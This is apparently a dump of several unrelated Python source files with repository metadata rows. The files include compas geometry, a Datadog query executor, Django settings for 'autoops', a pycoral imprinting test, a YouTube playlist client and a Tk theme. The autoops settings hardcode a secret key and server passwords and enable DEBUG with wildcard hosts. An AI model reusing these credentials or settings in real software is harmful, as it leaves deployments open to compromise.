>>> S = Scale.from_factors([1, 2, 3])
>>> S[0, 0] == 1
True
>>> S[1, 1] == 2
True
>>> S[2, 2] == 3
True
>>> from compas.geometry import Point, Frame
>>> point = Point(2, 5, 0)
>>> frame = Frame(point, (1, 0, 0), (0, 1, 0))
>>> points = [point, Point(2, 10, 0)]
>>> S = Scale.from_factors([2.] * 3, frame)
>>> [p.transformed(S) for p in points]
[Point(2.000, 5.000, 0.000), Point(2.000, 15.000, 0.000)]
"""
def __init__(self, matrix=None):
if matrix:
scale, _, _, _, _ = decompose_matrix(matrix)
check = matrix_from_scale_factors(scale)
if not allclose(flatten(matrix), flatten(check)):
raise ValueError('This is not a proper scale matrix.')
super(Scale, self).__init__(matrix=matrix)
def __repr__(self):
return "Scale({0!r})".format(self.matrix)
@classmethod
def from_factors(cls, factors, frame=None):
"""Construct a scale transformation from scale factors.
Parameters
----------
factors : list of float
The scale factors along X, Y, Z.
frame : :class:`compas.geometry.Frame`, optional
The anchor frame for the scaling transformation.
Defaults to ``None``.
Returns
-------
Scale
A scale transformation.
Examples
--------
>>> from compas.geometry import Point, Frame
>>> point = Point(2, 5, 0)
>>> frame = Frame(point, (1, 0, 0), (0, 1, 0))
>>> points = [point, Point(2, 10, 0)]
>>> S = Scale.from_factors([2.] * 3, frame)
>>> [p.transformed(S) for p in points]
[Point(2.000, 5.000, 0.000), Point(2.000, 15.000, 0.000)]
"""
S = cls()
if frame:
Tw = matrix_from_frame(frame)
Tl = matrix_inverse(Tw)
Sc = matrix_from_scale_factors(factors)
S.matrix = multiply_matrices(multiply_matrices(Tw, Sc), Tl)
else:
S.matrix = matrix_from_scale_factors(factors)
return S
| 33.271845
| 84
| 0.618325
|
4381df39395ce49072d0f6451d7e48751d8baac7
| 10,201
|
py
|
Python
|
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/datadog_checks/base/utils/db/core.py
|
OuesFa/integrations-core
|
0ffe4ca306580a2e775b515152384034c2dfdc03
|
[
"BSD-3-Clause"
] | null | null | null |
# (C) Datadog, Inc. 2019-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import logging
from itertools import chain
from typing import Any, Callable, Dict, List, Tuple
from datadog_checks.base import AgentCheck
from datadog_checks.base.utils.db.types import QueriesExecutor, QueriesSubmitter, Transformer
from ...config import is_affirmative
from ..containers import iter_unique
from .query import Query
from .transform import COLUMN_TRANSFORMERS, EXTRA_TRANSFORMERS
from .utils import SUBMISSION_METHODS, create_submission_transformer
class QueryExecutor(object):
"""
QueryExecutor is a lower-level implementation of QueryManager which supports multiple instances
per AgentCheck. It is used to execute queries via the `executor` parameter and submit resulting
telemetry via the `submitter` parameter.
"""
def __init__(
self,
executor, # type: QueriesExecutor
submitter, # type: QueriesSubmitter
queries=None, # type: List[Dict[str, Any]]
tags=None, # type: List[str]
error_handler=None, # type: Callable[[str], str]
hostname=None, # type: str
logger=None,
): # type: (...) -> QueryExecutor
self.executor = executor # type: QueriesExecutor
self.submitter = submitter # type: QueriesSubmitter
for submission_method in SUBMISSION_METHODS.keys():
if not hasattr(self.submitter, submission_method):
raise ValueError(
'QueryExecutor submitter is missing required submission method `{}`'.format(submission_method)
)
self.tags = tags or []
self.error_handler = error_handler
self.queries = [Query(payload) for payload in queries or []] # type: List[Query]
self.hostname = hostname # type: str
self.logger = logger or logging.getLogger(__name__)
def compile_queries(self):
"""This method compiles every `Query` object."""
column_transformers = COLUMN_TRANSFORMERS.copy() # type: Dict[str, Transformer]
for submission_method, transformer_name in SUBMISSION_METHODS.items():
method = getattr(self.submitter, submission_method)
# Save each method in the initializer -> callable format
column_transformers[transformer_name] = create_submission_transformer(method)
for query in self.queries:
query.compile(column_transformers, EXTRA_TRANSFORMERS.copy())
def execute(self, extra_tags=None):
"""This method executes all of the compiled queries."""
global_tags = list(self.tags)
if extra_tags:
global_tags.extend(list(extra_tags))
for query in self.queries:
query_name = query.name
query_columns = query.column_transformers
extra_transformers = query.extra_transformers
query_tags = query.base_tags
try:
rows = self.execute_query(query.query)
except Exception as e:
if self.error_handler:
self.logger.error('Error querying %s: %s', query_name, self.error_handler(str(e)))
else:
self.logger.error('Error querying %s: %s', query_name, e)
continue
for row in rows:
if not self._is_row_valid(query, row):
continue
# It holds the query results
sources = {} # type: Dict[str, str]
# It holds the transformers defined in query_columns along with the column value
submission_queue = [] # type: List[Tuple[Transformer, Any]]
tags = global_tags + query_tags
for (column_name, type_transformer), column_value in zip(query_columns, row):
# Columns can be ignored via configuration
if not column_name:
continue
sources[column_name] = column_value
column_type, transformer = type_transformer
# The transformer can be None for `source` types. Those such columns do not submit
# anything but are collected into the row values for other columns to reference.
if transformer is None:
continue
elif column_type == 'tag':
tags.append(transformer(None, column_value)) # get_tag transformer
elif column_type == 'tag_list':
tags.extend(transformer(None, column_value)) # get_tag_list transformer
else:
submission_queue.append((transformer, column_value))
for transformer, value in submission_queue:
transformer(sources, value, tags=tags, hostname=self.hostname)
for name, transformer in extra_transformers:
try:
result = transformer(sources, tags=tags, hostname=self.hostname)
except Exception as e:
self.logger.error('Error transforming %s: %s', name, e)
continue
else:
if result is not None:
sources[name] = result
def _is_row_valid(self, query, row):
# type: (Query, List) -> bool
if not row:
self.logger.debug('Query %s returned an empty result', query.name)
return False
num_columns = len(query.column_transformers)
if num_columns != len(row):
self.logger.error(
'Query %s expected %d column%s, got %d',
query.name,
num_columns,
's' if num_columns > 1 else '',
len(row),
)
return False
return True
def execute_query(self, query):
"""
Called by `execute`, this triggers query execution to check for errors immediately in a way that is compatible
with any library. If there are no errors, this is guaranteed to return an iterator over the result set.
"""
rows = self.executor(query)
if rows is None:
return iter([])
else:
rows = iter(rows)
# Ensure we trigger query execution
try:
first_row = next(rows)
except StopIteration:
return iter([])
return chain((first_row,), rows)
class QueryManager(QueryExecutor):
"""
This class is in charge of running any number of `Query` instances for a single Check instance.
You will most often see it created during Check initialization like this:
```python
self._query_manager = QueryManager(
self,
self.execute_query,
queries=[
queries.SomeQuery1,
queries.SomeQuery2,
queries.SomeQuery3,
queries.SomeQuery4,
queries.SomeQuery5,
],
tags=self.instance.get('tags', []),
error_handler=self._error_sanitizer,
)
self.check_initializations.append(self._query_manager.compile_queries)
```
Note: This class is not in charge of opening or closing connections, just running queries.
"""
def __init__(
self,
check, # type: AgentCheck
executor, # type: QueriesExecutor
queries=None, # type: List[Dict[str, Any]]
tags=None, # type: List[str]
error_handler=None, # type: Callable[[str], str]
hostname=None, # type: str
): # type: (...) -> QueryManager
"""
- **check** (_AgentCheck_) - an instance of a Check
- **executor** (_callable_) - a callable accepting a `str` query as its sole argument and returning
a sequence representing either the full result set or an iterator over the result set
- **queries** (_List[Dict]_) - a list of queries in dict format
- **tags** (_List[str]_) - a list of tags to associate with every submission
- **error_handler** (_callable_) - a callable accepting a `str` error as its sole argument and returning
a sanitized string, useful for scrubbing potentially sensitive information libraries emit
"""
super(QueryManager, self).__init__(
executor=executor,
submitter=check,
queries=queries,
tags=tags,
error_handler=error_handler,
hostname=hostname,
logger=check.log,
)
self.check = check # type: AgentCheck
only_custom_queries = is_affirmative(self.check.instance.get('only_custom_queries', False)) # type: bool
custom_queries = list(self.check.instance.get('custom_queries', [])) # type: List[str]
use_global_custom_queries = self.check.instance.get('use_global_custom_queries', True) # type: str
# Handle overrides
if use_global_custom_queries == 'extend':
custom_queries.extend(self.check.init_config.get('global_custom_queries', []))
elif (
not custom_queries
and 'global_custom_queries' in self.check.init_config
and is_affirmative(use_global_custom_queries)
):
custom_queries = self.check.init_config.get('global_custom_queries', [])
# Override statement queries if only running custom queries
if only_custom_queries:
self.queries = []
# Deduplicate
for i, custom_query in enumerate(iter_unique(custom_queries), 1):
query = Query(custom_query)
query.query_data.setdefault('name', 'custom query #{}'.format(i))
self.queries.append(query)
if len(self.queries) == 0:
self.logger.warning('QueryManager initialized with no query')
def execute(self, extra_tags=None):
# This needs to stay here b/c when we construct a QueryManager in a check's __init__
# there is no check ID at that point
self.logger = self.check.log
return super(QueryManager, self).execute(extra_tags)
| 40.480159
| 118
| 0.606901
|
1da7ff2c0066124e27700befb1c1944bacae8df5
| 5,621
|
py
|
Python
|
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | 2
|
2019-09-12T07:14:26.000Z
|
2020-05-26T15:07:53.000Z
|
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | null | null | null |
autoops/settings.py
|
jiajipan/autoops
|
edd728cf5c40675828d8e135370b5a3f0d070d24
|
[
"Apache-2.0"
] | null | null | null |
#/usr/src/python3
# -*- coding: utf-8 -*-
"""
Django settings for autoops project.
Generated by 'django-admin startproject' using Django 1.11.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'mo2+&!_l_7z0ty4%e75a#gdf%*&es4p6n$y90xk=18uao*&8*y'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*', ]
# Application definition
INSTALLED_APPS = [
'bootstrap3',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'asset',
'db',
'names',
'tasks',
'library',
'rest_framework',
'rest_framework.authtoken',
'djcelery',
'guardian',
'DjangoUeditor',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend', # default
'guardian.backends.ObjectPermissionBackend',
)
ANONYMOUS_USER_ID = -1
ROOT_URLCONF = 'autoops.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'autoops.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.mysql',
# 'NAME': 'autoops',
# 'USER': 'root',
# 'PASSWORD': '123456',
# 'HOST': '192.168.10.29',
# 'PORT': '3306',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Custom User Auth model
# AUTH_USER_MODEL = 'names.User'
SESSION_ENGINE = 'django.contrib.sessions.backends.db'
LOGIN_URL = '/login.html'
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'zh-Hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = False # 注意是False 配合下边时间格式
USE_TZ = False # 如果只是内部使用的系统,这行建议为false,不然会有时区问题
DATETIME_FORMAT = 'Y-m-d H:i:s' # suit在admin里设置时间的一个小bug。需要把时间格式指定一下
DATE_FORMAT = 'Y-m-d'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = '/static/'
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
import djcelery
djcelery.setup_loader()
BROKER_URL = 'redis://127.0.0.1:6379/0'
CELERY_RESULT_BACKEND = 'djcelery.backends.database:DatabaseBackend'
CELERY_ACCEPT_CONTENT = ['application/json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
CELERY_TIMEZONE = 'Asia/Shanghai'
CELERY_IMPORTS = ('tasks.task',)
CELERYBEAT_SCHEDULER = 'djcelery.schedulers.DatabaseScheduler'
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework.authentication.TokenAuthentication',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAdminUser',)
}
MEDIA_ROOT = os.path.join(BASE_DIR, 'upload/')
MEDIA_URL = '/upload/' # 这个是在浏览器上访问该上传文件的url的前缀
Inception_ip = '192.168.10.99' ## 此为 Inception 软件地址 需要设置
Inception_port = '6669' ## 此为 Inception 软件端口号
Webssh_ip = '42.62.55.58' ##WebSSH 软件的 访问IP
Webssh_port='9000'
inception_remote_system_password='654321' ## 设置回滚备份服务器相关参数,并同步修改一下 script/inc.cnf 里面的设置
inception_remote_system_user='root'
inception_remote_backup_port='3306'
inception_remote_backup_host='192.168.10.100'
| 26.144186
| 92
| 0.667675
|
ccede5afa7c0446284976cb5d43cb77793a8f876
| 1,888
|
py
|
Python
|
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | 4
|
2021-12-01T23:25:37.000Z
|
2021-12-12T09:30:33.000Z
|
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | null | null | null |
flatlatex/transliteration.py
|
jb-leger/flatlatex
|
744afe3b6afa5b3b1996aad14d184af3a0590dfb
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2016, Jean-Benoist Leger <jb@leger.tf>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from . import latexfuntypes
def transliterate(alphabet):
alphabet_keys = alphabet.keys()
def fun(flat_input):
flat_output = ""
success = True
for c in flat_input:
if c in alphabet_keys:
flat_output += alphabet[c]
else:
flat_output += c
success = False
return (flat_output, success)
return fun
def transliterator(alphabet):
return latexfuntypes.latexfun(lambda x: transliterate(alphabet)(x[0])[0], 1)
| 40.170213
| 80
| 0.728814
|
9fe893242b4360fe80f3aa8e7ae202024b5402db
| 6,034
|
py
|
Python
|
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | 1
|
2021-04-30T19:49:01.000Z
|
2021-04-30T19:49:01.000Z
|
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | null | null | null |
tests/imprinting_evaluation_test.py
|
notaJiminLee/pycoral
|
d04eabadb69b57899c429d808633969444985ff2
|
[
"Apache-2.0"
] | 1
|
2021-06-03T21:24:40.000Z
|
2021-06-03T21:24:40.000Z
|
# Lint as: python3
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Evaluates the accuracy of imprinting based transfer learning model."""
import contextlib
import os
from PIL import Image
from pycoral.adapters import classify
from pycoral.adapters import common
from pycoral.learn.imprinting.engine import ImprintingEngine
from pycoral.utils.edgetpu import make_interpreter
from tests import test_utils
import unittest
@contextlib.contextmanager
def test_image(path):
with open(path, 'rb') as f:
with Image.open(f) as image:
yield image
class ImprintingEngineEvaluationTest(unittest.TestCase):
def _transfer_learn_and_evaluate(self, model_path, keep_classes, dataset_path,
test_ratio, top_k_range):
"""Transfer-learns with given params and returns the evaluation result.
Args:
model_path: string, path of the base model.
keep_classes: bool, whether to keep base model classes.
dataset_path: string, path to the directory of dataset. The images should
be put under sub-directory named by category.
test_ratio: float, the ratio of images used for test.
top_k_range: int, top_k range to be evaluated. The function will return
accuracy from top 1 to top k.
Returns:
list of float numbers.
"""
engine = ImprintingEngine(model_path, keep_classes)
extractor = make_interpreter(engine.serialize_extractor_model())
extractor.allocate_tensors()
num_classes = engine.num_classes
print('--------------- Parsing dataset ----------------')
print('Dataset path:', dataset_path)
# train in fixed order to ensure the same evaluation result.
train_set, test_set = test_utils.prepare_data_set_from_directory(
dataset_path, test_ratio, True)
print('Image list successfully parsed! Number of Categories = ',
len(train_set))
print('--------------- Processing training data ----------------')
print('This process may take more than 30 seconds.')
train_input = []
labels_map = {}
for class_id, (category, image_list) in enumerate(train_set.items()):
print('Processing {} ({} images)'.format(category, len(image_list)))
train_input.append(
[os.path.join(dataset_path, category, image) for image in image_list])
labels_map[num_classes + class_id] = category
# train
print('---------------- Start training -----------------')
size = common.input_size(extractor)
for class_id, images in enumerate(train_input):
for image in images:
with test_image(image) as img:
common.set_input(extractor, img.resize(size, Image.NEAREST))
extractor.invoke()
engine.train(classify.get_scores(extractor),
class_id=num_classes + class_id)
print('---------------- Training finished -----------------')
with test_utils.temporary_file(suffix='.tflite') as output_model_path:
output_model_path.write(engine.serialize_model())
# Evaluate
print('---------------- Start evaluating -----------------')
classifier = make_interpreter(output_model_path.name)
classifier.allocate_tensors()
# top[i] represents number of top (i+1) correct inference.
top_k_correct_count = [0] * top_k_range
image_num = 0
for category, image_list in test_set.items():
n = len(image_list)
print('Evaluating {} ({} images)'.format(category, n))
for image_name in image_list:
with test_image(os.path.join(dataset_path, category,
image_name)) as img:
# Set threshold as a negative number to ensure we get top k
# candidates even if its score is 0.
size = common.input_size(classifier)
common.set_input(classifier, img.resize(size, Image.NEAREST))
classifier.invoke()
candidates = classify.get_classes(classifier, top_k=top_k_range)
for i in range(len(candidates)):
candidate = candidates[i]
if candidate.id in labels_map and \
labels_map[candidate.id] == category:
top_k_correct_count[i] += 1
break
image_num += n
for i in range(1, top_k_range):
top_k_correct_count[i] += top_k_correct_count[i - 1]
return [top_k_correct_count[i] / image_num for i in range(top_k_range)]
def _test_oxford17_flowers_single(self, model_path, keep_classes, expected):
top_k_range = len(expected)
ret = self._transfer_learn_and_evaluate(
test_utils.test_data_path(model_path), keep_classes,
test_utils.test_data_path('oxford_17flowers'), 0.25, top_k_range)
for i in range(top_k_range):
self.assertGreaterEqual(ret[i], expected[i])
# Evaluate with L2Norm full model, not keeping base model classes.
def test_oxford17_flowers_l2_norm_model_not_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=False,
expected=[0.86, 0.94, 0.96, 0.97, 0.97])
# Evaluate with L2Norm full model, keeping base model classes.
def test_oxford17_flowers_l2_norm_model_keep_classes(self):
self._test_oxford17_flowers_single(
'mobilenet_v1_1.0_224_l2norm_quant.tflite',
keep_classes=True,
expected=[0.86, 0.94, 0.96, 0.96, 0.97])
if __name__ == '__main__':
test_utils.coral_test_main()
| 39.437908
| 80
| 0.670036
|
5464a9f02415ec1f1b704a5fb0bbf29e52066acf
| 155
|
py
|
Python
|
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
preprocessing.py
|
saurabhghatnekar/Iris-dataset-practice
|
b3bdb842c51d3a18a4a2b4a44663f9bf901a9468
|
[
"MIT"
] | null | null | null |
import pandas as pd
from io import StringIO
csv_data = \
'''A,B,C,D
1.0,2.0,3.0,4.0
5.0,6.0,,8.0
10.0,11.0,12.0,'''
df = pd.read_csv(StringIO(csv_data))
| 14.090909
| 36
| 0.63871
|
0250f8486ed71d37b29d05c41524c9e87b6ba9c7
| 5,787
|
py
|
Python
|
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
src/youtube.py
|
j3parker/playlists
|
06710cf3ac5ed03f3280f4925284794184db021c
|
[
"CC0-1.0"
] | null | null | null |
import google.oauth2.credentials
import google_auth_oauthlib.flow
import googleapiclient.discovery
import googleapiclient.errors
import model
import os
class Client:
"""Interface with YouTube for syncing playlists."""
def __init__(self, client):
self.client = client
self.placeholder_map = {}
def from_environment():
creds =google.oauth2.credentials.Credentials(
token = None,
token_uri = 'https://oauth2.googleapis.com/token',
refresh_token = os.environ['REFRESH_TOKEN'],
client_id = os.environ['OAUTH_CLIENT_ID'],
client_secret = os.environ['OAUTH_CLIENT_SECRET'],
)
client = googleapiclient.discovery.build(
'youtube', 'v3',
credentials = creds,
)
return Client(client)
def get_playlists(self):
response = self.list_playlists()
return [
model.Playlist(
playlist['id'],
playlist['snippet']['title'],
playlist['snippet']['description'],
self.get_playlistitems(playlist['id']),
)
for playlist in response['items']
if playlist['status']['privacyStatus'] == 'public'
]
def get_playlistitems(self, id):
response = self.list_playlistitems(id)
return [
model.PlaylistItem(
item['id'],
item['snippet']['playlistId'],
item['contentDetails']['videoId'],
item['snippet']['position'],
)
for item in response['items']
]
def apply(self, op):
if isinstance(op, model.OpNewPlaylist):
new_id = self.insert_playlist(
title = op.title,
description = op.description,
privacy_status = 'public',
)
self.placeholder_map[op.playlist_id.nonce] = new_id
print(f'Remembering that {op.playlist_id} -> {new_id}')
elif isinstance(op, model.OpUpdatePlaylistMetadata):
self.update_playlist(
playlist_id = op.playlist_id,
title = op.title,
description = op.description,
)
elif isinstance(op, model.OpDeletePlaylist):
self.delete_playlist(
playlist_id = op.playlist_id,
)
elif isinstance(op, model.OpAddToPlaylist):
if isinstance(op.playlist_id, model.PlaceholderId):
playlist_id = self.placeholder_map[op.playlist_id.nonce]
else:
playlist_id = op.playlist_id
self.insert_playlistitem(
playlist_id = playlist_id,
video_id = op.video_id,
position = op.position,
)
elif isinstance(op, model.OpReorderPlaylistItem):
self.update_playlistitem(
item_id = op.item_id,
playlist_id = op.playlist_id,
video_id = op.video_id,
position = op.position,
)
elif isinstance(op, model.OpRemoveFromPlaylist):
self.delete_playlistitem(op.item_id)
else:
raise Exception('unimplemented operation')
def list_playlists(self):
return self.client.playlists().list(
part = 'snippet,status',
mine = True,
maxResults = 50,
).execute()
def insert_playlist(self, title, description, privacy_status):
return self.client.playlists().insert(
part = 'snippet,status',
body = {
'snippet': {
'title': title,
'description': description,
},
'status': {
'privacyStatus': privacy_status,
},
},
).execute()['id']
def update_playlist(self, playlist_id, title, description):
self.client.playlists().update(
part = 'id,snippet',
body = {
'id': playlist_id,
'snippet': {
'title': title,
'description': description,
},
},
).execute()
def delete_playlist(self, playlist_id):
self.client.playlists().delete(playlist_id).execute()
def list_playlistitems(self, id):
return self.client.playlistItems().list(
part = 'contentDetails,snippet',
playlistId = id,
maxResults = 50,
).execute()
def insert_playlistitem(self, playlist_id, video_id, position):
self.client.playlistItems().insert(
part = 'snippet',
body = {
'snippet': {
'playlistId': playlist_id,
'resourceId': {
'kind': 'youtube#video',
'videoId': video_id,
},
'position': position,
},
},
).execute()
def update_playlistitem(self, item_id, playlist_id, video_id, position):
self.client.playlistItems().update(
part = 'snippet',
body = {
'id': item_id,
'snippet': {
'playlistId': playlist_id,
'resourceId': {
'kind': 'youtube#video',
'videoId': video_id,
},
'position': position,
},
},
).execute()
def delete_playlistitem(self, item_id):
wut = self.client
wut2 = wut.playlistItems()
wut3 = wut2.delete(id = item_id)
wut3.execute()
| 31.112903
| 76
| 0.507862
|
2bed9b36d5c6415119415401c03586363a01bbff
| 8,037
|
py
|
Python
|
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | null | null | null |
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | 139
|
2020-02-23T16:42:10.000Z
|
2021-07-26T23:19:53.000Z
|
friendly_ground_truth/view/light_theme.py
|
p2irc/friendly_ground_truth
|
69415a435ff46d424bf204894a1691dd2e900fc6
|
[
"MIT"
] | null | null | null |
"""
File Name: light_theme.py
Authors: Kyle Seidenthal
Date: 22-05-2020
Description: Light Theme
"""
from tkinter import ttk
colours = {
"toolbar_activate": "#ffde4d",
"pbar_colour": "#2640b5",
"link_colour": "#5978ff",
"bg_level_0": "#d9d9d9",
"fg_level_0": "#000000",
"bg_level_1": "#c4c4c4",
"fg_level_1": "#000000",
"bg_level_2": "#a8a8a8",
"fg_level_2": "#000000",
"bg_level_3": "#919191",
"fg_level_3": "#000000"
}
settings = {
"PersistantToolbar.TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2'],
"borderwidth": 2,
"bordercolor": colours['bg_level_2']
},
"map": {
"background": [('pressed', colours['toolbar_activate']),
('disabled', colours['toolbar_activate']),
('active', colours['bg_level_3'])],
"foreground": [],
"relief": [('pressed', 'sunken'), ('disabled', 'sunken'),
('!disabled', 'flat')]
}
},
"Toolbar.TButton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2']
},
"map": {
"background": [('active', colours['bg_level_3'])],
"relief": [('pressed', 'sunken')]
}
},
"Toolbar.TFrame": {
"configure": {
"borderwidth": 1,
"bordercolor": colours['bg_level_2'],
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"Toolbar.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1']
}
},
"TSeparator": {
"configure": {
"background": colours['bg_level_0'],
"foreground": colours['fg_level_0']
}
},
"MenuBar.TMenubutton": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"bordercolor": colours['bg_level_2'],
"activeforeground": colours['fg_level_2'],
"activebackground": colours['bg_level_2']
}
},
"Menu.TMenubutton": {
"configure": {
"background": colours['bg_level_2'],
"foreground": colours['fg_level_2'],
"bordercolor": colours['bg_level_3'],
"activeforeground": colours['fg_level_3'],
"activebackground": colours['bg_level_3']
}
},
"TFrame": {
"configure": {
"background": colours['bg_level_1']
}
},
"Main.TFrame": {
"configure": {
"background": colours['bg_level_0']
}
},
"TEntry": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3']
}
},
"InfoPanel.TLabel": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"padding": 10
}
},
"InfoPanel.TFrame": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"bordercolor": colours['bg_level_2'],
}
},
"Horizontal.TProgressbar": {
"configure": {
"background": colours['pbar_colour'],
"foreground": colours['pbar_colour'],
"troughcolor": colours['fg_level_2']
}
},
"InfoPanel.Horizontal.TScale": {
"configure": {
"background": colours['bg_level_1'],
"foreground": colours['fg_level_1'],
"troughcolor": colours['bg_level_3']
}
},
"Horizontal.TScrollbar": {
"configure": {
"background": colours['bg_level_3'],
"foreground": colours['fg_level_3'],
"highlightcolor": colours['fg_level_3'],
